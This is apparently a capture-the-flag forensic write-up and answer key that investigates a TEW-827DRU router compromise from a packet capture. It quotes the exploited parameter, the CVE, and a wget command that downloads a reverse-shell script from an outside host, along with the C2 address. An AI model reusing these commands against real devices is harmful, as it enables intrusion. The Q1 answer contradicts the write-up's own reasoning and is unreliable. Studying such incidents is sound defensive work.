Trent
Last updated
Last updated
The SOC team has identified suspicious lateral movement targeting router firmware from within the network. Anomalous traffic patterns and command execution have been detected on the router, indicating that an attacker already inside the network has gained unauthorized access and is attempting further exploitation. You will be given network traffic logs from one of the impacted machines. Your task is to conduct a thorough investigation to unravel the attacker's Techniques, Tactics, and Procedures (TTPs).
Q1) From what IP address did the attacker initially launched their activity?
Let's navigate to Statistics > Conversations to review IP pairings and determine which internal IP address initiated communication with the router.
Let's filter for this IP address and POST requests to verify whether it was the initial IP used by the attacker to launch their activity.
Next, we will trace the HTTP stream for further analysis.
The attacker sent a POST request from IP address 192.168.10.2 to modify the router's configuration.
Answer: 192.168.10.1
Q2) What is the model name of the compromised router?
The router’s IP address is 192.168.10.1, and the attacker is targeting its admin interface via POST requests to /apply_sec.cgi and /apply.cgi. These endpoints, along with pages like smbserver.asp, suggest a web-based admin panel.
Answer: TEW-827DRU
Q3) How many failed login attempts did the attacker try before successfully logging into the router?
It appears that the attacker initially attempted to use two different passwords before discovering that no password was required.
We can also utilize NetworkMiner as an additional tool for analysis.
Answer: 2
Q4) At what UTC time did the attacker successfully log into the routers web admin interface?
Answer: 2024-05-01 15:53:27
Q5) How many characters long was the password used to log in successfully?
As observed in Q3, no password is required.
Answer: 0
Q6) What is the current firmware version installed on the compromised router?
Let's follow the HTTP stream.
Answer: 2.10
Q7) Which HTTP parameter was manipulated by the attacker to get remote code execution on the system?
Answer: usbapps.config.smb_admin_name
Q8) What is the CVE number associated with the vulnerability that was exploited in this attack?
Answer: CVE-2024-28353
Q9) What was the first command the attacker executed by exploiting the vulnerability?
Answer: whoami
Q10) What command did the actor use to initiate the download of a reverse shell to the router from a host outside the network?
Answer: wget http://35.159.25.253:8000/a1l4m.sh
Q11) Multiple attempts to download the reverse shell from an external IP failed. When the actor made a typo in the injection, what response message did the server return?
In this request, the attacker removed the backtick (`) at the end. Let's analyze the TCP stream associated with this request.
Answer: Access to this resource is forbidden
Q12) What was the IP address and port number of the command and control (C2) server when the actor's reverse shell eventually did connect? (IP:Port)
Let's retrieve and review the contents of the Bash script that was downloaded by the attacker.
Or using NetworkMiner.
Answer: 35.159.25.253:41143
